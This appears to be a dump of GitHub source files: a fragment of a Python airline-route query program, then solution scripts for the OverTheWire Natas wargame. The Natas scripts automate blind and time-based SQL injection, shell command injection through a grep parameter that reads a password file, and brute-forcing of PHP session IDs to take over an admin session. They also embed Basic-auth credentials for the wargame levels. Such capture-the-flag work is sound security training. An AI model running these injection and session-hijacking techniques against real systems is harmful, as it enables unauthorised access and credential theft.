* 200) / acceleration)\n distance_static = legs[i] - 400\n totalTime += distance_static / 750\n #i=0 ,when #airport>2,wait\n if((i + 2) < len(airports)):\n #a outgoing plane means 10 mins off\n outbound = len(city_list[airports[i+1]].accessibleList)-1\n totalTime += 2 - outbound/6\n\n return totalTime\n\n\n\n'''\nhelper function to print a list of cities\n'''\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n"
},
{
"alpha_fraction": 0.5403530597686768,
"alphanum_fraction": 0.5409836173057556,
"avg_line_length": 33.11827850341797,
"blob_id": "35b050c928ce130affc19694e6d74d8bd2147b10",
"content_id": "516165c94cfce5699208fbd6e5bb8f2fa34d16a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3172,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 93,
"path": "/CS242assignment2.1/implements/MyParser.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = \"shiwei\"\n\nimport json\n\nfrom implements import City\n\n\n\"\"\"\nIt parse file to database, or save data to file\n\"\"\"\nclass MyParser():\n # @param sourcefile: the data file in json used as the source to parse\n def __init__(self, sourcefile):\n self.sourcefile = sourcefile\n self.code_indexed_cityList = {}\n self.searchForCode = {}\n \n \"\"\"\n use this function to initial the database or parse a new file\n @param when new=\"init\", it means the original state\n otherwise, new= new file name\n \"\"\"\n def parse(self,new):\n if new == \"init\":\n jsondata = json.load(open(self.sourcefile))\n else:\n jsondata = json.load(open(new))\n \n # parse through the city information\n for metro in jsondata[\"metros\"]:\n code = metro[\"code\"]\n name = metro[\"name\"]\n country = metro[\"country\"]\n continent = metro[\"continent\"]\n timezone = metro[\"timezone\"]\n coordinates = metro[\"coordinates\"]\n population = metro[\"population\"]\n region = metro[\"region\"]\n \n # Creat the city object with its own factors\n city = City.City(code, name, country, continent, timezone, coordinates, population, region)\n \n # translate: code->city object\n self.code_indexed_cityList[city.code] = city\n\n # translate: city name->city code\n self.searchForCode[city.name] = code\n \n # record the j of each route (saved as code) and use code as a index to keep distance data\n # struture: (code, distance) pair in a list\n for route in jsondata[\"routes\"]: \n departure_code = route[\"ports\"][0]\n j_code = route[\"ports\"][1]\n distance = route[\"distance\"]\n self.code_indexed_cityList[departure_code].accessibleList[j_code] = distance\n\n '''\n It will write to a file named by filename in the JSON format\n '''\n def save_disk(self,filename):\n root = {}\n metros = []\n routes = []\n \n # i in type city\n for i in self.code_indexed_cityList.itervalues():\n city_dict = {}\n city_dict[\"code\"] = i.code\n city_dict[\"name\"] = i.name\n city_dict[\"country\"] = i.country\n city_dict[\"continent\"] = i.continent\n city_dict[\"timezone\"] = i.timezone\n city_dict[\"coordinates\"] = i.coordinates\n city_dict[\"population\"] = i.population\n city_dict[\"region\"] = i.region\n \n metros.append(city_dict)\n \n # j is the target of accessibleList\n for j in i.accessibleList:\n distance = i.accessibleList[j]\n route_dic = {}\n #code\n route_dic[\"ports\"] = [i.code, j]\n route_dic[\"distance\"] = distance\n routes.append(route_dic)\n \n root[\"metros\"] = metros\n root[\"routes\"] = routes\n\n # Write the JSON output to the file\n new_file = open(filename, \"w\")\n new_file.write(json.dumps(root))"
},
{
"alpha_fraction": 0.5337874889373779,
"alphanum_fraction": 0.5409685373306274,
"avg_line_length": 33.70606994628906,
"blob_id": "9895aec6126077ca4fee8077b3e676aa822524a7",
"content_id": "d4aed7c76f05dec8b1e031d360fbd1ad1a836552",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10862,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 313,
"path": "/CS242assignment2.1/implements/UI_interface.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport webbrowser\n\nfrom implements import Shortest_route, MyParser, Query, AboutRoute, Edit\n\n\n\n\n\n#initial view\n\n\"\"\"\nparse the initial document and deal with user's operation in the first view\n\"\"\"\ndef main():\n print(\"CSAir Query System\")\n print(\"edited by Wei Shi\")\n print(\"loading...\")\n\n ui_parser = MyParser.MyParser(\"myData.txt\")\n ui_parser.parse(\"init\")\n\n print(\"Start Search Now\\n\")\n\n while True:\n display_menu()\n user_input = raw_input()\n if user_input == \"1\":\n query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"2\" :\n print(\"If the system fails to open a chrome, open a browser and visit:\")\n print(openMap(ui_parser.code_indexed_cityList, ui_parser.searchForCode))\n elif user_input == \"q\" :\n break\n elif user_input == \"3\":\n edit_operation(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"4\":\n AboutRoute.routeInformation(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"5\":\n file_name = raw_input(\"Source File: \")\n ui_parser.parse(file_name)\n print(\"Done. Data parsed in.\")\n elif user_input == \"6\":\n file_name = raw_input(\"Name a new File: \")\n ui_parser.save_disk(file_name)\n print(\"Saved!\")\n elif user_input == \"7\":\n Shortest_route.findShortestRoute(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n else:\n print(\"Invalid Input, try again!\")\n\n\"\"\"\ndeal with user's operation in the edit selection view\n\"\"\"\ndef edit_operation(city_list, searchForCode):\n query = Query.Query(city_list, searchForCode)\n while(True):\n print(\"City List:\")\n print_cities(query.get_all_city())\n valid_city = False\n while(not valid_city):\n print(\"Select a city to edit or q to go back:\")\n city_name = raw_input()\n valid_city = city_name in searchForCode\n if(city_name == \"q\"):\n return \n \n city = city_list[searchForCode[city_name]]\n \n \n while(True):\n print_edit_menu()\n user_input = raw_input()\n if(user_input == \"1\"):\n Edit.remove_city(city.name, city_list, searchForCode)\n print(city.name + \" removed!\")\n # special case to break since no more actions can occur on this list\n break\n elif(user_input ==\"2\"):\n output = \"\"\n for destination in city.accessibleList:\n output += destination + \", \"\n print(\"valid destination to remove :\"+output[:-2])\n \n valid_destination = False\n while(not valid_destination):\n print(\"Select a Destination for removal\")\n destination = raw_input()\n valid_destination = destination in city.accessibleList\n \n Edit.remove_route(city, destination)\n print(\"Route Removed!\")\n elif(user_input ==\"3\"):\n destination = raw_input(\"Destination Code: \")\n distance = int(raw_input(\"Distance: \"))\n Edit.add_route(city, destination, distance)\n print(\"Route Added\")\n elif(user_input ==\"4\"):\n country = raw_input(\"New Country: \")\n Edit.change_country(city, country)\n print(\"Changed Country!\")\n elif(user_input ==\"5\"):\n continent = raw_input(\"New Continent Value: \")\n Edit.change_continent(city, continent)\n print(\"Changed Continent!\")\n elif(user_input ==\"6\"):\n timezone = int(raw_input(\"New Timezone Value: \"))\n Edit.change_timezone(city, timezone)\n print(\"Changed Timezone!\")\n elif(user_input == \"7\"):\n region = int(raw_input(\"New Region Value: \"))\n Edit.change_region(city, region)\n print(\"Changed Region!\")\n elif(user_input == \"8\"):\n population = int(raw_input(\"New Population Value: \"))\n Edit.change_population(city, population)\n print(\"Changed Population!\")\n elif(user_input == \"9\"):\n a=raw_input()\n b=raw_input()\n c=raw_input()\n d=raw_input()\n e=raw_input()\n f=raw_input()\n g=raw_input()\n h=raw_input()\n i=raw_input()\n\n Edit.add_city(a,b,c,d,e,f,g,h,city_list,searchForCode,i)\n elif(user_input == \"q\"):\n break\n else:\n print(\"Invalid input, try again...\")\n\n\n\"\"\"\nprint the guidance for edit\n\"\"\"\ndef print_edit_menu():\n print(\"What do you want to modify? quit by 'q' :\")\n print(\"1 - Remove City\")\n print(\"2 - Remove a Route\")\n print(\"3 - Add a Route\")\n print(\"4 - Modify Country\")\n print(\"5 - Modify Continent\")\n print(\"6 - Modify Timezone\")\n print(\"7 - Modify Region\")\n print(\"8 - Modify Population\")\n\n\n# the view for choosing city\n\n\"\"\"\ndeal with query on general infomation\n\"\"\"\ndef query(city_list, searchForCode):\n the_query = Query.Query(city_list, searchForCode)\n\n while True:\n print(\"City List:\")\n print_cities(the_query.get_all_city())\n # for i in the_query.get_all_city():\n # print i,\n print\n print(\"Type a city for querying on or q to go back, Otherwise:\")\n display_half()\n user_input = raw_input()\n if user_input == \"q\":\n return\n elif(user_input == \"a\"):\n print(\"From: \"+the_query.get_longest_flight()[0])\n print(\"To: \"+the_query.get_longest_flight()[1])\n print(\"Distance:\"+str(the_query.get_longest_flight()[2]))\n elif(user_input ==\"b\"):\n print(\"From: \"+the_query.get_shortest_flight()[0])\n print(\"To: \"+the_query.get_shortest_flight()[1])\n print(\"Distance:\"+str(the_query.get_shortest_flight()[2]))\n elif(user_input ==\"c\"):\n print(\"Average_distance :\"+str(the_query.get_average_distance()))\n elif(user_input ==\"d\"):\n print(\"Biggest_city :\"+the_query.get_biggest_city()[0])\n print(\"Population_max :\"+str(the_query.get_biggest_city()[1]))\n elif(user_input ==\"e\"):\n print(\"Smallest_city :\"+the_query.get_smallest_city()[0])\n print(\"Population_min :\"+str(the_query.get_smallest_city()[1]))\n elif(user_input ==\"f\"):\n print(\"Average_population: \"+str(the_query.get_average_size()))\n elif(user_input == \"g\"):\n temp=the_query.get_continent_list().items()\n for i in temp:\n print(i[0]+\":\")\n for j in i[1]:\n print j,\n print\n elif(user_input == \"h\"):\n for i in the_query.get_hub_city():\n print(i)\n elif user_input not in the_query.get_all_city():\n print(\"Invalid Input, try again\")\n #print(\"Select a city for querying or q to go back:\")\n query(city_list, searchForCode)\n return\n else:\n print\n display_query_doc()\n query_option(the_query,user_input,city_list,searchForCode)\n print\n\n'''\nhelper function to print a list of cities\n'''\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n\n\"\"\"\ndeal with query on a city\n\"\"\"\ndef query_option(the_query,city, city_list, searchForCode):\n while True:\n user_input = raw_input()\n if(user_input == \"1\"):\n print(\"City_code: \"+the_query.get_city_code(city))\n elif(user_input == \"2\"):\n print(\"Country :\"+the_query.get_country(city))\n elif(user_input == \"3\"):\n print(\"Continent :\"+the_query.get_continent(city))\n elif(user_input == \"4\"):\n print(\"Timezone :\"+str(the_query.get_timezone(city)))\n elif(user_input == \"5\"):\n print(the_query.get_coordinates(city).items()[0][0]+\": \"+str(the_query.get_coordinates(city).items()[0][1]))\n print(the_query.get_coordinates(city).items()[1][0]+\": \"+str(the_query.get_coordinates(city).items()[1][1]))\n elif(user_input == \"6\"):\n print(\"Population :\"+str(the_query.get_population(city)))\n elif(user_input == \"7\"):\n print(\"Region: \"+str(the_query.get_region(city)))\n elif(user_input == \"8\"):\n for i in the_query.get_accessible_list(city_list[searchForCode[city]]):\n print(\"To: \"+i[0]+\" Distance: \"+str(i[1]))\n elif(user_input == \"q\"):\n return\n else:\n print(\"Invalid Input, try again!\")\n\n\n# open the map in a chrome\ndef openMap(city_list, searchForCode):\n URL = \"http://www.gcmap.com/mapui?P=\"\n for i in city_list:\n city = city_list[i]\n departure_code = city.code\n for destination_code in city.accessibleList.keys():\n URL += (departure_code + \"-\" + destination_code + \",+\")\n\n webbrowser.open_new(URL)\n return URL\n\"\"\"\ndisplay the instruction of query\n\"\"\"\ndef display_query_doc():\n print(\"Please Select a choice or press q to quit:\")\n print(\"1 - City Code\")\n print(\"2 - Country the city belongs to \")\n print(\"3 - Continent the city belongs to \")\n print(\"4 - Timezone of the city\")\n print(\"5 - Coordinates of the city\")\n print(\"6 - Population of the city\")\n print(\"7 - Region of the city\")\n print(\"8 - Cities directly accessible from the given city\")\n\n\n\"\"\"\ndisplay the query option for general info\n\"\"\"\ndef display_half():\n print(\"a - Longest Flight Length\")\n print(\"b - Shortest Flight Length\")\n print(\"c - Average Flight Length\")\n print(\"d - Biggest City & Population\")\n print(\"e - Smallest City & Population\")\n print(\"f - Average Population Size\")\n print(\"g - List Continents with Cities\")\n print(\"h - List of Hub Cities\")\n\n\"\"\"\ndisplay the original menu\n\"\"\"\ndef display_menu():\n print(\"Send 1 or 2 to make the choice or Send q to quit:\")\n print(\"1 - Query\")\n print(\"2 - Glance at the Route Map\")\n print(\"3 - Edit the Network\")\n print(\"4 - Info about a Route\")\n print(\"5 - Parse a File and Add to the Network\")\n print(\"6 - Save Network to a File\")\n print(\"7 - shortest route search\")\n\n\n\nif __name__ == '__main__':\n main()"
}
] | 9 |
darumaseye/Natas
|
https://github.com/darumaseye/Natas
|
ac59263c8b278322d4ba5d883b52e2303e9fff59
|
cea1d19a286b9022c37c8fabdae9ed60ba511465
|
3c6f6d140bc63dfc7beeac2f0fc358a6df383c0b
|
refs/heads/master
| 2020-05-22T19:57:51.532794 | 2019-05-28T18:08:40 | 2019-05-28T18:08:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6092985272407532,
"alphanum_fraction": 0.6245241761207581,
"avg_line_length": 30.435897827148438,
"blob_id": "9bebbab48cee40dc0bfa483d8aabf08386789ae3",
"content_id": "665edbff95714118b258e711d32fed14d3923c2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3678,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 117,
"path": "/natas19.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport binascii\n\n#The script makes the first request to natas19.natas.labs.overthewire.org, using username and password;\n#\n#\n#It loops from 0 to MAX_PHPSSID (in this case 640), \n# for each loop it\n# - makes the request using the Auth field and the PHPSSID_cookie\n# - looks for \"you're an admin\" in the response body\n# - in this case break\n# - \n#Print the response of the last\n######\n### In this case the phpsessid was the string \"[num]-[user]\" coded in hex.\n### Winning string: '281-admin'\n#####\n\nlink= 'http://natas19.natas.labs.overthewire.org?debug=1'\n\nfor cookie_payload in range(0,641):\n cookie_tostring=str(cookie_payload)\n cookie_payload = binascii.hexlify(bytes(str(cookie_payload), encoding=\"ascii\"))\n cookie_jar = {'PHPSESSID':str(cookie_payload,'ascii')+'2d61646d696e'}\n print('Requesting with PHPSESSID: '+cookie_tostring+'-admin')\n req = get(link, cookies=cookie_jar, auth=HTTPBasicAuth('natas19','4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'))\n if(req.status_code==200):\n soup = BeautifulSoup(req.text, 'html.parser')\n if 'You are logged in as a regular user. Login as an admin to retrieve credentials for natas20.' in req.text:\n print('Cookie '+str(cookie_payload)+' is not a valid Admin Session')\n elif 'You are an admin. The credentials for the next level are' in req.text:\n print('Cookie '+str(cookie_payload)+' is a valid Admin Session!')\n print(soup.prettify())\n exit(0)\n else:\n print('####### Generic Error #######')\n print(soup.prettify())\n exit(1)\n else:\n print('######## HTTP ERROR: '+str(req.status_code)+'########\\nRetrying...')\n exit(1)\n\n\n\n'''\n\nCode for natas18\n$maxid = 640; // 640 should be enough for everyone\n\nfunction isValidAdminLogin() {\n if($_REQUEST[\"username\"] == \"admin\") {\n /* This method of authentication appears to be unsafe and has been disabled for now. */\n //return 1;\n }\n\n return 0;\n}\n\nfunction isValidID($id) {\n return is_numeric($id);\n}\nfunction createID($user) {\n global $maxid;\n return rand(1, $maxid);\n}\nfunction debug($msg) {\n if(array_key_exists(\"debug\", $_GET)) {\n print \"DEBUG: $msg<br>\";\n }\n}\nfunction my_session_start() {\n if(array_key_exists(\"PHPSESSID\", $_COOKIE) and isValidID($_COOKIE[\"PHPSESSID\"])) {\n if(!session_start()) {\n debug(\"Session start failed\");\n return false;\n } else {\n debug(\"Session start ok\");\n if(!array_key_exists(\"admin\", $_SESSION)) {\n debug(\"Session was old: admin flag set\");\n $_SESSION[\"admin\"] = 0; // backwards compatible, secure\n }\n return true;\n }\n }\n\n return false;\n}\nfunction print_credentials() { \n if($_SESSION and array_key_exists(\"admin\", $_SESSION) and $_SESSION[\"admin\"] == 1) {\n print \"You are an admin. The credentials for the next level are:<br>\";\n print \"<pre>Username: natas19\\n\";\n print \"Password: <censored></pre>\";\n } else {\n print \"You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.\";\n }\n}\n\n$showform = true;\nif(my_session_start()) {\n print_credentials();\n $showform = false;\n} else {\n if(array_key_exists(\"username\", $_REQUEST) && array_key_exists(\"password\", $_REQUEST)) {\n session_id(createID($_REQUEST[\"username\"]));\n session_start();\n $_SESSION[\"admin\"] = isValidAdminLogin();\n debug(\"New session started\");\n $showform = false;\n print_credentials();\n }\n} \n\nif($showform) {\n?> '''\n"
},
{
"alpha_fraction": 0.5633561611175537,
"alphanum_fraction": 0.5770547986030579,
"avg_line_length": 37.59321975708008,
"blob_id": "189ffb02dd2bce869f30432ecfcd498a77bfe0a9",
"content_id": "76333ae1dc9a7636decd680fccc9844b6483d5d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4675,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 118,
"path": "/natas17.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "''' \r\nSolution-Script for Natas17 - OverTheWire\r\n\r\nDaruma's_eye\r\n'''\r\nfrom string import ascii_letters\r\nfrom string import digits\r\nfrom time import sleep\r\nfrom time import time\r\nfrom requests import get # ==> per fare richieste get\r\nfrom urllib.parse import quote # ==> per fare codificare l'injection in codifica URL \r\nalpha_numeric = ascii_letters + digits\r\ndelay = 0.1\r\nsleep_sec = 1\r\n\r\n#Header delle richieste get, viene usato il campo Auth per accdere al sito tramite password,\r\n# il valore è un base64 dell'utente e della password\r\nheader={'Host' : 'natas17.natas.labs.overthewire.org'\\\r\n ,'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=='}\r\n\r\n\r\n#Nella prima parte si applica la query { natas18\" and if(password like '___' , sleep(1), 0); # } \r\n# al campo username per stimare la lunghezza della password, si utlizza elapsed.seconds per\r\n# confrontarlo con il tempo dello sleep mysql nell'injection\r\nincomplete_injection = 'natas18\" and if(password like \\''\r\n\r\npassword_length = 0\r\nwhile True:\r\n\r\n password_length += 1\r\n incomplete_injection = incomplete_injection + '_'\r\n injection = incomplete_injection + '\\', sleep(' +str( sleep_sec )+ '), 0); # '\r\n print( 'Testing password of '+str( password_length )+' chars: with '+injection )\r\n \r\n injection = quote( injection,safe= '')\r\n url = 'http://natas17.natas.labs.overthewire.org/?username='+ injection\r\n \r\n req = get( url, headers= header ) \r\n\r\n #Potrebbe succedere che a causa di ritardi nella rete una richiesta impieghi più tempo del previsto\r\n # per sicurezza viene effettuata una seconda prova\r\n if( req.status_code == 200 ):\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n \r\n print( 'Request produced http_code 200 in ' +str( req.elapsed.seconds )+ ' secs > ' +str( sleep_sec )+ '\\nRetesting in 1 sec...')\r\n sleep ( 1 )\r\n\r\n req = get( url , headers= header )\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n break\r\n \r\n else:\r\n print('########## HTTP ERROR: ' +str( req.status_code )+ '##########\\nRetrying...')\r\n incomplete_injection = incomplete_injection[ 0:len( incomplete_injection )-1]\r\n\r\n sleep( delay )\r\n\r\nprint( 'It seems that the password is '+str( password_length )+' chars long.\\nWe can proceed with bruteforcing...' )\r\n\r\nsleep( 0.5 )\r\n\r\n\r\n#Nella seconda parte si si applica la query { natas18\" and if(password like '%' , sleep(1), 0); # } \r\n# come nella prima parte ma in questo caso si fa il bruteforcing carattere per carattere \r\npassword=''\r\ni=0\r\nwhile( i < password_length ):\r\n \r\n for char in alpha_numeric:\r\n \r\n print( 'Testing char '+ char +' for position '+ str(i) )\r\n injection = 'natas18\" and if(password like binary \\'' + password + char\r\n \r\n if( i!= password_length -1 ):\r\n injection = injection +'%'\r\n injection = injection +'\\', sleep(' +str( sleep_sec )+ '), 0); # ' \r\n print( 'Testing '+injection )\r\n\r\n injection = quote( injection,safe='' ) \r\n\t url = 'http://natas17.natas.labs.overthewire.org/?username=' +injection\r\n \r\n\t req = get( url, headers= header )\r\n\r\n\r\n if( req.status_code==200 ):\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n\r\n #Potrebbe succedere che a causa di ritardi nella rete una richiesta impieghi più tempo del previsto\r\n # per sicurezza viene effettuata una seconda prova\r\n print( 'Request produced http_code 200 in ' +str( req.elapsed.seconds )+ ' secs > ' +str( sleep_sec )+ '\\nRetesting in 0.5 sec...' )\r\n sleep(.5)\r\n req = get( url, headers= header )\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n password = password+char\r\n print( 'The char of position '+ str(i) +' is : '+ char )\r\n break\r\n \r\n\r\n #Nel caso in cui non si trova una corrispondenza finendo i caratteri a disposizione\r\n # si ipotizza che ci sia stato un problema con la richiesta e quindi si decrementa\r\n # la i per riprovare la posizione che ha fallito\r\n elif( char == '9' ):\r\n\r\n i-= 1\r\n break\r\n \r\n else:\r\n\r\n print( '########## HTTP ERROR: ' +str( req.status_code )+ '##########\\nRetrying...' )\r\n password = password[ 0:len( password )-1 ]\r\n i=i-1\r\n break\r\n\r\n sleep( delay )\r\n\r\n i+= 1\r\n\r\nprint( 'We have the password! Here it is: '+password )\r\n"
},
{
"alpha_fraction": 0.5921586155891418,
"alphanum_fraction": 0.652996838092804,
"avg_line_length": 39.345455169677734,
"blob_id": "08da414773a82dd89eb40abf3a2ce04e7ff4734e",
"content_id": "75d7af7c72dff27206668a4a9a110d7ac0e77e20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2219,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 55,
"path": "/natas16.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nfrom requests.auth import HTTPBasicAuth\nfrom string import ascii_lowercase\nfrom string import ascii_uppercase\nimport time\n\n# $(grep -v -E ^[[:alnum:]]{i}char(i)[[:alnum:]]{max-1-i}$)Africa\n\nchar_well = ascii_lowercase+ascii_uppercase+'0123456789'\nstrained_chars = '' \nsemaphore=0\nchar_num=0\nwhile(semaphore==0):\n char_num=char_num+1\n print('Doing: '+str(char_num))\n payload='%24%28grep+%2Dv+%2DE+%5E%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n link='http://natas16.natas.labs.overthewire.org/?needle='+payload+'&submit=Search'\n head={'Host': 'natas16.natas.labs.overthewire.org'\\\n ,'Accept-Encoding': 'gzip, deflate'\\\n ,'DNT': '1'\\\n ,'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=='}\n req = requests.get(link, headers=head)\n soup = BeautifulSoup(req.text, 'html.parser')\n search_output= soup.body.div.pre.string\n if(search_output!='\\n'):\n semaphore=1\n time.sleep(.300)\n\nprint('Seems that the password is '+str(char_num)+' chars long')\n\npassword=''\nfor i in range(char_num):\n for char in char_well: \n print('Doing: '+char+' of '+str(i))\n if(i==0):\n payload='%24%28grep+%2Dv+%2DE+%5E%5E%5B'+char+'%5D%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num-1)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n else:\n payload='%24%28grep+%2Dv+%2DE+%5E%5B%5B%3Aalnum%3A%5D%5D%7B'+str(i)+'%7D%5B'+char+'%5D%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num-1-i)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n\n link='http://natas16.natas.labs.overthewire.org/?needle='+payload+'&submit=Search'\n head={'Host': 'natas16.natas.labs.overthewire.org'\\\n ,'Accept-Encoding': 'gzip, deflate'\\\n ,'DNT': '1'\\\n ,'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=='}\n req = requests.get(link, headers=head)\n soup = BeautifulSoup(req.text, 'html.parser')\n search_output= soup.body.div.pre.string\n if(search_output!='\\n'):\n print(char)\n password=password+char\n break\n time.sleep(.300)\n\nprint(password)\n"
},
{
"alpha_fraction": 0.6033464670181274,
"alphanum_fraction": 0.6141732335090637,
"avg_line_length": 32.85555648803711,
"blob_id": "9d5adbae0a99a86d8acc0f13951a000d59e5da0f",
"content_id": "a38c254adb8b3bdf798d8cafc8edca1ff21326bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3049,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 90,
"path": "/natas15.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "''' \nSolution-Script for Natas15 - OverTheWire\n\nDaruma's_eye\n'''\nfrom string import ascii_letters\nfrom string import digits\nfrom time import sleep\nfrom requests import get # ==> per fare richieste get \nfrom urllib.parse import quote # ==> per fare codificare l'injection in codifica URL\n\nalpha_numeric = ascii_letters + digits\ndelay = 0.1\n\n#Header delle richieste get, viene usato il campo Auth per accdere al sito tramite password,\n# il valore è un base64 dell'utente e della password\nheader={'Host' : 'natas15.natas.labs.overthewire.org'\\\n ,'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg'}\n\n\n\n#Nella prima parte si applica la query { natas16\" and password like '___' ; # } \n# al campo username per stimare la lunghezza della password, si controlla quindi se la risposta \n# contiene la stringa 'This user exists'\nincomplete_injection = 'natas16\" and password like \\''\n\npassword_length = 0\nwhile True:\n password_length += 1\n print( 'Testing password of '+str( password_length )+' chars' )\n incomplete_injection = incomplete_injection + '_'\n injection = incomplete_injection + '\\';# '\n \n injection = quote( injection,safe= ''\n url = 'http://natas15.natas.labs.overthewire.org/?username='+ injection\n \n req = get( url, headers= header )\n \n if 'This user exists.' in req.text:\n break\n\n elif 'This user doesn\\'t exist.' in req.text:\n print( 'This is not the right length...Incrementing...' )\n else:\n print( '########## GENERIC ERROR ##########' )\n exit(1)\n\n sleep( delay )\n\nprint( 'It seems that the password is '+str( password_length )+' chars long.\\nWe can proceed with bruteforcing...' )\n\nsleep( 0.5 )\n\n\n#Nella seconda parte si applica la query { natas16\" and password like ''; # } \n# come nella prima parte ma in questo caso si fa il bruteforcing carattere per carattere\npassword=''\nfor i in range( password_length ):\n\n for char in alpha_numeric:\n\n print( 'Testing char '+ char +' for position '+ str(i) )\n injection = 'natas16\" and password like binary \\'' + password + char\n \n if( i!=password_length-1 ):\n for j in range(password_length-i-1):\n injection = injection+'_'\n injection= injection+'\\';# ' \n print( 'Testing '+injection )\n\n injection = quote( injection,safe='' )\n\t url = 'http://natas15.natas.labs.overthewire.org/?username='+ injection \n \n req = get( url, headers= header )\n \n if 'This user exists.' in req.text:\n password = password+char\n print( 'The char of position '+ str(i) +' is : '+ char )\n break \n\n elif 'This user doesn\\'t exist.' in req.text:\n print( 'This is not the right char for this position...' )\n \n else:\n print( '########## GENERIC ERROR ##########' )\n exit(1)\n\n sleep( delay )\n\nprint( 'We have the password! Here it is: '+password )\n\n"
},
{
"alpha_fraction": 0.614829421043396,
"alphanum_fraction": 0.6318897604942322,
"avg_line_length": 39.105262756347656,
"blob_id": "67f5f987065c387eb58ade112f87e286fa45e8f7",
"content_id": "197dcdd579ba7f26f2a756bccd64a0487d1fb83a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 38,
"path": "/natas18.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nfrom bs4 import BeautifulSoup\n\n#The script makes the first request to natas18.natas.labs.overthewire.org, using username and password;\n#\n#It loops from 0 to MAX_PHPSSID (in this case 640), \n# for each loop it\n# - makes the request using the Auth field and the PHPSSID_cookie\n# - looks for \"you're an admin\" in the response body\n# - in this case break\n# - \n#Print the response of the last\n\nlink= 'http://natas18.natas.labs.overthewire.org?debug=1'\nreq = get(link, auth=HTTPBasicAuth('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'))\n\n\nfor cookie_payload in range(0,641):\n \n cookie_jar = {'PHPSESSID':str(cookie_payload)}\n req = get(link, cookies=cookie_jar, auth=HTTPBasicAuth('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'))\n if(req.status_code==200):\n soup = BeautifulSoup(req.text, 'html.parser')\n if 'You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.' in req.text:\n print('Cookie '+str(cookie_payload)+' is not a valid Admin Session')\n elif 'You are an admin. The credentials for the next level are' in req.text:\n print('Cookie '+str(cookie_payload)+' is a valid Admin Session!')\n print(soup.prettify())\n exit(0)\n else:\n print('####### Generic Error #######')\n print(soup.prettify())\n exit(1)\n else:\n print('######## HTTP ERROR: '+str(req.status_code)+'########\\nRetrying...')\n exit(1)\n"
}
] | 5 |
Mazzdev/Mazedev
|
https://github.com/Mazzdev/Mazedev
|
cd37125fa33295a1c316b6f50083016f174e158e
|
c5e74795474889ed7402bac478e0b2e93a0a4b7a
|
812eeaf4e2cd13cd9be84dc7d0840a9274d3aecd
|
refs/heads/master
| 2022-11-24T19:09:34.078748 | 2020-08-02T15:22:09 | 2020-08-02T15:22:09 | 267,849,254 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6559633016586304,
"alphanum_fraction": 0.6697247624397278,
"avg_line_length": 23.22222137451172,
"blob_id": "8489ad7d543290e84f5614478de10f5319884046",
